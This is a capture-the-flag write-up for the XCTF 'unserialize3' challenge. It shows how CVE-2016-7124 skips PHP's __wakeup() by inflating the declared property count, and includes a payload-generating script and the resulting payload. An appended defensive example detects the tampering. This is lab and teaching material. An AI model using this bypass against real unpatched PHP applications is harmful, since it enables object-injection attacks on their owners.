XCTF - unserialize3

unserialize3

This challenge is again PHP deserialization.

On opening the page, a few lines of code are given:

class xctf{
    public $flag = '111';
    public function __wakeup(){
        exit('bad requests');
    }
}
?code=

This shows an xctf class with the magic method __wakeup(), which is triggered when an object is deserialized; here it simply exits with 'bad requests'. The trailing ?code= hints that the serialized string is passed in the code query parameter.

I did a similar challenge this morning using CVE-2016-7124: when the number of properties declared in the serialized string is greater than the number of properties actually present, the call to __wakeup() is skipped.

PHP script to generate the payload:

<?php
class xctf{
    public $flag = '111';
    public function __construct($flag) {
        $this->flag = $flag;
    }
    public function __wakeup(){
        exit('bad requests');
    }
}
$a = new xctf('xxx');
$b = serialize($a);
echo $b;
echo '<br>';
// Bump the declared property count from 1 to 2 so it exceeds the real count
$c = str_replace(':1:', ':2:', $b);
echo $c;
?>

payload: O:4:"xctf":2:{s:4:"flag";s:3:"xxx";}
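As an added example, not part of the original write-up, here is the defensive side of the same pattern: a structural check that rejects a serialized object whose declared property count does not match the properties it carries, plus a loader that uses allowed_classes (PHP 7+); the class name xctf and the function names propertyCountMismatch and loadXctf are this example's own.

```php
<?php
// Added example, not from the original write-up. Defensive side of the
// CVE-2016-7124 pattern used above: the tampered string declares more
// properties (the "2" in O:4:"xctf":2:{...}) than it actually carries, which
// on unpatched PHP (before 5.6.25 / 7.0.10) skips __wakeup(). Rejecting such
// input before unserialize() removes the bypass regardless of PHP version.

class xctf {
    public $flag = '111';
    public function __wakeup() {
        exit('bad requests');
    }
}

// True when the top-level object header declares a property count that does
// not match the number of name/value pairs inside the braces. Assumes a flat
// object with scalar (s/i/b/d/N) values, which is all the xctf class has.
function propertyCountMismatch(string $s): bool {
    if (preg_match('/^O:\d+:"[^"]+":(\d+):\{(.*)\}$/s', $s, $m) !== 1) {
        return true; // not a plain serialized object: treat as suspicious
    }
    $declared = (int)$m[1];
    // Scalar tokens look like s:3:"xxx"; i:5; b:1; d:1.5; N; and there are
    // two per property (name + value), so pairs = tokens / 2.
    $tokens = preg_match_all('/(?:[sibd]:[^;]*|N);/', $m[2]);
    if ($tokens % 2 !== 0) {
        return true;
    }
    return intdiv($tokens, 2) !== $declared;
}

// Load an xctf object only from input that passes the structural check, and
// only let the xctf class itself be instantiated (no other gadget classes).
function loadXctf(string $s) {
    if (propertyCountMismatch($s)) {
        return false;
    }
    $obj = unserialize($s, ['allowed_classes' => ['xctf']]);
    return ($obj instanceof xctf) ? $obj : false;
}

// Constructed inputs: an honest string and the tampered one from the write-up.
$honest   = 'O:4:"xctf":1:{s:4:"flag";s:3:"xxx";}';
$tampered = 'O:4:"xctf":2:{s:4:"flag";s:3:"xxx";}';

var_dump(propertyCountMismatch($honest));   // declared 1, present 1
var_dump(propertyCountMismatch($tampered)); // declared 2, present 1
var_dump(loadXctf($tampered));              // rejected before unserialize()
```

loadXctf() is not called on the honest string in the demo because a genuine deserialization would run __wakeup() and exit the script, which is exactly the behaviour the check preserves.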


Source: www.cnblogs.com/R3col/p/12698508.html